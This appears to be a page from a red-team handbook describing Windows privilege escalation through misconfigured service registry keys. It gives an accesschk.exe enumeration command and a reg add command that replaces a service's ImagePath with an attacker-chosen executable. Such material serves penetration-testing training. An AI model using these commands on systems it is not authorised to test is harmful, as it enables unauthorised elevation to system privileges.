> For the complete documentation index, see [llms.txt](https://kwcsec.gitbook.io/the-red-team-handbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kwcsec.gitbook.io/the-red-team-handbook/techniques/privilege-escalation/insecure-permissions/misconfigured-registry-hives.md).

# Misconfigured Registry Hives

We may have over privileged access to some registry keys that we can abuse for privilege escalation.&#x20;

```
accesschk.exe -accepteula -kvuqsw hklm\System\CurrentControlSet\services > file.txt
```

In this file, we want to look at "Authenticated Users", and see if we have any interesting privileges to any interesting keys. For example, if we have "KEY\_ALL\_ACCESS" to a service, we can abuse this for privilege escalation.

To abuse this, we can issue the following command:

```
reg add HKLM\SYSTEM\CurrentControlSet\services\service /v ImagePath /t REG_EXPAND_SZ /d C:\executable /f  
```

We know have to wait for the service to restart, or somehow trigger it to restart.
